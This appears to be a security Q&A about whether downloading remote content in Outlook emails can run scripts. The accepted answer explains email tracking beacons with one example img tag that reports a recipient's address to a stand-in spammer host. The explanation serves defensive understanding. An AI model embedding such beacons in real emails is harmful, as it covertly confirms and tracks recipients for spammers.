# Automatic execution of Javascript or malicious code in email

Tags: javascript, security, email, outlook, download

In Outlook, When we receive inbound messages from an unknown source, a toolbar at the top of the message allows us to permanently Add Sender to Safe Senders List, or a one-time "Download Content"

Various people have been setting a configuration for "Automatically download from any source"... which we are advising them against.

The Microsoft site states that HTML content, scripts or images could be used as a "beacon" to report back to the persons web server that the email address is valid.

If just by viewing or previewing, an email message can POST to a web server, is it possible to also execute JS or other malicious code, if the HTML / Images are downloaded in this manner?

Comment: If there is any flaw in Outlook then the [preview pane can trigger the malware](http://security.stackexchange.com/questions/60744/can-malware-be-activated-by-previewing-email-in-outlooks-preview-pane), regardless of the download from any source setting. This is usually no more of a risk though than letting users access the web through Internet Explorer, so don't let this alarm you. The downloading from any source is more of a privacy issue than a security threat.

Answer (score 1, accepted):

Not displaying images in emails is more a matter of anti-spamming policy adopted by your email client (most of them nowadays do that by default).

If I for instance were to look for a bunch of active email accounts I could just randomly send messages using this format:

```
to: john@doe.com

message: <img src="http://spammer.com/verifyAccount.png?account=john@doe.com">
```

And then I could set my web server at *spammer.com* to log the requests received (while in the meantime providing the image) so that every time an user opened one of my malicious emails i could be sure that user was active, and so be able to avoid wasting my resources spamming on inactive or inexistent accounts.

But again, it's about policy issue, not security threat, and the same is true for any external resource (say stylesheets) that the email may attempt to load.

JS is generally not even available in mail clients, so no real threat is coming from that side either.